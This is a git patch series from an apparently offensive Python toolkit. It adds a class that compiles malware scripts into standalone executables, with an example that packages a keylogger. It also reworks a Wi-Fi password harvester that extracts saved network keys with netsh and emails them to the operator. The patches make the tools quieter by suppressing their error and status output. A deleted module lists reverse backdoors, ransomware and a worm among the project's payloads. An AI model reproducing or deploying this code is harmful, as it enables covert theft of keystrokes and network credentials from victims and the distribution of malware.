From 097bd08d8eda48b72f89f7b42808c9085fbc3190 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Wed, 15 Jun 2022 22:12:13 +0530 Subject: [PATCH 1/3] implement class to generate executables fix imports in malwares examples update requirements --- .gitignore | 6 ++ examples/EvilFiles/Malwares/key_logger.py | 2 +- .../Malwares/wifi-password-harvester.py | 11 ++- examples/EvilFiles/generatorScript.py | 15 ++++ pyhtools/evil_files/exec_generator.py | 72 +++++++++++++++++++ .../malwares/keylogger/keylogger.py | 2 - pyhtools/evil_files/malwares/utils.py | 5 +- .../wireless_password_harvester/harvester.py | 22 +++--- pyhtools/executable_generator/__init__.py | 0 pyhtools/executable_generator/generator.py | 50 ------------- requirements.txt | 13 ++-- setup.py | 1 + 12 files changed, 125 insertions(+), 74 deletions(-) create mode 100644 examples/EvilFiles/generatorScript.py create mode 100644 pyhtools/evil_files/exec_generator.py delete mode 100644 pyhtools/executable_generator/__init__.py delete mode 100644 pyhtools/executable_generator/generator.py diff --git a/.gitignore b/.gitignore index 4906f4c..b56642a 100644 --- a/.gitignore +++ b/.gitignore @@ -143,3 +143,9 @@ dmypy.json cython_debug/ # End of https://www.toptal.com/developers/gitignore/api/python + +# exectuables +*.bin +*.exe +*.build +*.dist \ No newline at end of file diff --git a/examples/EvilFiles/Malwares/key_logger.py b/examples/EvilFiles/Malwares/key_logger.py index 35b7f54..5dc61fa 100644 --- a/examples/EvilFiles/Malwares/key_logger.py +++ b/examples/EvilFiles/Malwares/key_logger.py @@ -1,4 +1,4 @@ -from pyhtools.evil_files.malwares.keylogger import KeyLogger +from pyhtools.evil_files.malwares.keylogger.keylogger import KeyLogger key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60) key_logger.run() diff --git a/examples/EvilFiles/Malwares/wifi-password-harvester.py b/examples/EvilFiles/Malwares/wifi-password-harvester.py index b9b7fbd..33e56e9 100644 --- a/examples/EvilFiles/Malwares/wifi-password-harvester.py +++ b/examples/EvilFiles/Malwares/wifi-password-harvester.py @@ -1,4 +1,3 @@ -import imp from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester # create obj @@ -9,5 +8,11 @@ smtp_port=587, ) -# start harvester -harvester.start() +# retreives only credentials +credentials = harvester.get_credentials() + +# retreives creds and sends mail +if harvester.start(): + print("[*] Process Completed.") +else: + print("[!] Process Incomplete, start again!") \ No newline at end of file diff --git a/examples/EvilFiles/generatorScript.py b/examples/EvilFiles/generatorScript.py new file mode 100644 index 0000000..7435e49 --- /dev/null +++ b/examples/EvilFiles/generatorScript.py @@ -0,0 +1,15 @@ +from pyhtools.evil_files.exec_generator import (Compilers ,ExecutableGenerator) + +exe = ExecutableGenerator( + file_path=r'D:\GithubRepos\pyhtools\examples\EvilFiles\Malwares\key_logger.py', # evil program file path + output_filename='evil_file', # output filename without extension, adding extension might raise error + output_dir='.', # output directory + compiler=Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW + onefile=True, # creates single exe file + remove_output=True, # deletes all compiled files and retains only exe +) + +if exe.generate_executable() == 0: + print("[*] Process Completed.") +else: + print("[!] Error Occurred") \ No newline at end of file diff --git a/pyhtools/evil_files/exec_generator.py b/pyhtools/evil_files/exec_generator.py new file mode 100644 index 0000000..25b4236 --- /dev/null +++ b/pyhtools/evil_files/exec_generator.py @@ -0,0 +1,72 @@ +''' +module: generator.py +description: generates evil file executable +''' +from subprocess import call +from os import name as os_name +from enum import Enum + + +class Compilers(Enum): + DEFAULT = 0 + MINGW = 1 + CLANG = 2 + + +class ExecutableGenerator: + ''' + creates executable + ''' + + def __init__(self, file_path: str, output_filename: str = None, output_dir: str = None, icon: str = None, compiler: Compilers = Compilers.DEFAULT, onefile: bool = True, remove_output: bool = True,) -> None: + # file options + self.__file = file_path + self.__output_filename = output_filename + + # set options + self.__options = { + 'onefile': onefile, + 'standalone': True, + 'onefile': True, + 'remove-output': remove_output, + 'output-dir': output_dir, + } + + # os based options + if os_name == 'nt': + self.__options['icon'] = icon + else: + icon = None + + # compiler based options + if compiler == Compilers.CLANG: + self.__options['clang'] = True + elif compiler == Compilers.MINGW: + self.__options['mingw'] = True + + def __generate_command(self): + command = 'nuitka ' + for key in self.__options: + cmd = '' + value = self.__options[key] + value_type = type(self.__options[key]) + + # generate option + if value_type is bool and value: + cmd = f'--{key} ' + elif value_type is str: + cmd = f'--{key}="{value}" ' + + # add option to command + command += cmd + + if self.__output_filename: + pass + + # add file name and return + command += f'{self.__file}' + return command + + def generate_executable(self): + command = self.__generate_command() + return call(command.split(), shell=True) diff --git a/pyhtools/evil_files/malwares/keylogger/keylogger.py b/pyhtools/evil_files/malwares/keylogger/keylogger.py index b9cb6df..a80fe54 100644 --- a/pyhtools/evil_files/malwares/keylogger/keylogger.py +++ b/pyhtools/evil_files/malwares/keylogger/keylogger.py @@ -84,7 +84,6 @@ def mail_report(self): ''' self.log_no += 1 - # print(self.logs) self.send_mail() self.set_subject() timer = threading.Timer(self.interval, self.mail_report) @@ -95,7 +94,6 @@ def run(self): ''' run/start the keylogger. ''' - print('[*] Starting logger.') key_listener = pynput.keyboard.Listener(on_press=self.log_key) with key_listener: diff --git a/pyhtools/evil_files/malwares/utils.py b/pyhtools/evil_files/malwares/utils.py index f8056c6..d00e944 100644 --- a/pyhtools/evil_files/malwares/utils.py +++ b/pyhtools/evil_files/malwares/utils.py @@ -2,7 +2,7 @@ import requests -def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> bool: +def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587, supress_exceptions:bool=True) -> bool: ''' sends mail to specific address/addresses. ''' @@ -14,7 +14,8 @@ def send_mail(email: str, receiver_mail: list[str], password: str, message: str, server.quit() return True except smtplib.SMTPException as e: - print('[-] Exception : ', e) + if not supress_exceptions: + print('[-] Exception : ', e) return False diff --git a/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py index 456bcc9..658ec44 100644 --- a/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py +++ b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py @@ -1,4 +1,5 @@ from pyhtools.evil_files.malwares.utils import send_mail +from os import name as os_name import subprocess import re @@ -34,30 +35,31 @@ def get_username(): overall_nw_data = f'Subject: Received Credentials from {get_username()} \n' ssid_passwds = 'SSID : Password\n' for network_name in network_names: - if 'QuantumRegion' in network_name: - continue - + # sanitize network name network_name = network_name.replace('\r', '') - command = 'netsh wlan show profile "' + \ - (network_name) + '" key=clear' - nw_info = subprocess.check_output(command, shell=True).decode() + # get password using netsh + nw_info = subprocess.check_output( + f'netsh wlan show profile "{network_name}" key=clear', shell=True).decode() overall_nw_data += nw_info passwd_res = re.search(r'(?:Key\sContent\s*:\s)(.*)', nw_info) - passwd = passwd_res.group(1) - + passwd = None # AP without password security + try: + passwd = passwd_res.group(1) + except AttributeError: + pass ssid_passwds += f'{network_name} : {passwd}\n' overall_nw_data += ssid_passwds return overall_nw_data def start(self): + if os_name != 'nt': + raise credentials = self.get_credentials() if credentials: if send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port): - print('[*] Process Completed Successfully') return True else: - print('[-] Process Failed.') return False diff --git a/pyhtools/executable_generator/__init__.py b/pyhtools/executable_generator/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/executable_generator/generator.py b/pyhtools/executable_generator/generator.py deleted file mode 100644 index b2a31c2..0000000 --- a/pyhtools/executable_generator/generator.py +++ /dev/null @@ -1,50 +0,0 @@ -''' -module: generator.py -description: generates evil files using specified payload and type -''' -from enum import Enum -# from subprocess import check_call, check_output - - -# TODO: convert all evil files modules into classes -# create new class object with parameters and generate -# evil file using specified compiler using subprocess - - -class CompileOptions(Enum): - PYINTALLER = 0 - NUITKA = 1 - - -class Generator: - def __init__(self, _type: str, payload: str, compiler: CompileOptions = CompileOptions.PYINTALLER, *args, **kwargs) -> None: - self.__type = _type - self.__payload = payload - self.__compiler = compiler - - self.__options = { - 'malwares': [ - 'credential_harvester', - 'keylogger', - 'http_reverse_backdoor', - 'tcp_reverse_backdoor', - 'telegram_data_harvester', - 'telegram_remote_code_executor', - 'wireless_password_harvester' - ], - 'ransomwares': [ - 'dmsec', - ], - 'worms': [ - 'dir_cloner' - ], - } - - def verify(): - pass - - def show_options(): - pass - - def generate_file(): - pass diff --git a/requirements.txt b/requirements.txt index b9494c4..121ec2c 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,14 +1,15 @@ beautifulsoup4>=4.9.3 colorama>=0.4.4 #netfilterqueue (for linux devices only): sudo pip3 install --upgrade -U git+https://github.com/kti/python-netfilterqueue -nuitka kamene>=0.32 -scapy>=2.4.5 -psutil>=5.8.0 -prettytable>=2.1.0 -pynput>=1.7.3 +nuitka pyfiglet>=0.8.post1 +pynput>=1.7.3 pytelegrambotapi>=4.0.1 +prettytable>=2.1.0 +psutil>=5.8.0 pyinstaller requests>=2.25.1 -# wmi # for windows process management \ No newline at end of file +scapy>=2.4.5 +# wmi # for windows process management +zstandard \ No newline at end of file diff --git a/setup.py b/setup.py index a727922..88be931 100644 --- a/setup.py +++ b/setup.py @@ -32,6 +32,7 @@ 'pytelegrambotapi', 'pyinstaller', 'requests', + 'zstandard', ], classifiers=[ 'Development Status :: 4 - Beta', From bbb478a3371147fd0195fe6f2e5b264b527e03b0 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Wed, 15 Jun 2022 22:38:53 +0530 Subject: [PATCH 2/3] remove output filename parameter from ExecutableGenerator --- .gitignore | 3 ++- examples/EvilFiles/generatorScript.py | 20 +++++++++----------- pyhtools/evil_files/exec_generator.py | 9 +++------ 3 files changed, 14 insertions(+), 18 deletions(-) diff --git a/.gitignore b/.gitignore index b56642a..03153a0 100644 --- a/.gitignore +++ b/.gitignore @@ -148,4 +148,5 @@ cython_debug/ *.bin *.exe *.build -*.dist \ No newline at end of file +*.dist +*exectuables* \ No newline at end of file diff --git a/examples/EvilFiles/generatorScript.py b/examples/EvilFiles/generatorScript.py index 7435e49..6fbce68 100644 --- a/examples/EvilFiles/generatorScript.py +++ b/examples/EvilFiles/generatorScript.py @@ -1,15 +1,13 @@ -from pyhtools.evil_files.exec_generator import (Compilers ,ExecutableGenerator) +from pyhtools.evil_files.exec_generator import (Compilers, ExecutableGenerator) +from os import getcwd exe = ExecutableGenerator( - file_path=r'D:\GithubRepos\pyhtools\examples\EvilFiles\Malwares\key_logger.py', # evil program file path - output_filename='evil_file', # output filename without extension, adding extension might raise error - output_dir='.', # output directory - compiler=Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW - onefile=True, # creates single exe file - remove_output=True, # deletes all compiled files and retains only exe + file_path = r'D:\GithubRepos\pyhtools\examples\EvilFiles\generatorScript.py', # evil program file path + output_filename = 'evil_file', # output filename without extension, adding extension might raise error + output_dir = getcwd(), # output directory + compiler = Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW + onefile = True, # creates single exe file + remove_output = True, # deletes all compiled files and retains only exe ) -if exe.generate_executable() == 0: - print("[*] Process Completed.") -else: - print("[!] Error Occurred") \ No newline at end of file +return_code = exe.generate_executable() \ No newline at end of file diff --git a/pyhtools/evil_files/exec_generator.py b/pyhtools/evil_files/exec_generator.py index 25b4236..ff55915 100644 --- a/pyhtools/evil_files/exec_generator.py +++ b/pyhtools/evil_files/exec_generator.py @@ -18,10 +18,9 @@ class ExecutableGenerator: creates executable ''' - def __init__(self, file_path: str, output_filename: str = None, output_dir: str = None, icon: str = None, compiler: Compilers = Compilers.DEFAULT, onefile: bool = True, remove_output: bool = True,) -> None: + def __init__(self, file_path: str, output_dir: str = None, icon: str = None, compiler: Compilers = Compilers.DEFAULT, onefile: bool = True, remove_output: bool = True,) -> None: # file options self.__file = file_path - self.__output_filename = output_filename # set options self.__options = { @@ -55,13 +54,10 @@ def __generate_command(self): if value_type is bool and value: cmd = f'--{key} ' elif value_type is str: - cmd = f'--{key}="{value}" ' + cmd = f'--{key} "{value}" ' # add option to command command += cmd - - if self.__output_filename: - pass # add file name and return command += f'{self.__file}' @@ -69,4 +65,5 @@ def __generate_command(self): def generate_executable(self): command = self.__generate_command() + print(command) return call(command.split(), shell=True) From aa197054590264a32c9427d4ebd9818aa5d66087 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Wed, 15 Jun 2022 22:51:44 +0530 Subject: [PATCH 3/3] remove output directory options --- examples/EvilFiles/generatorScript.py | 5 ++--- pyhtools/evil_files/exec_generator.py | 3 +-- 2 files changed, 3 insertions(+), 5 deletions(-) diff --git a/examples/EvilFiles/generatorScript.py b/examples/EvilFiles/generatorScript.py index 6fbce68..4d4a892 100644 --- a/examples/EvilFiles/generatorScript.py +++ b/examples/EvilFiles/generatorScript.py @@ -2,9 +2,8 @@ from os import getcwd exe = ExecutableGenerator( - file_path = r'D:\GithubRepos\pyhtools\examples\EvilFiles\generatorScript.py', # evil program file path - output_filename = 'evil_file', # output filename without extension, adding extension might raise error - output_dir = getcwd(), # output directory + file_path = r'D:\GithubRepos\pyhtools\examples\EvilFiles\Malwares\key_logger.py', # evil program file path + output_dir = '.', # output directory compiler = Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW onefile = True, # creates single exe file remove_output = True, # deletes all compiled files and retains only exe diff --git a/pyhtools/evil_files/exec_generator.py b/pyhtools/evil_files/exec_generator.py index ff55915..85698ab 100644 --- a/pyhtools/evil_files/exec_generator.py +++ b/pyhtools/evil_files/exec_generator.py @@ -54,7 +54,7 @@ def __generate_command(self): if value_type is bool and value: cmd = f'--{key} ' elif value_type is str: - cmd = f'--{key} "{value}" ' + cmd = f'--{key}={value} ' # add option to command command += cmd @@ -65,5 +65,4 @@ def __generate_command(self): def generate_executable(self): command = self.__generate_command() - print(command) return call(command.split(), shell=True)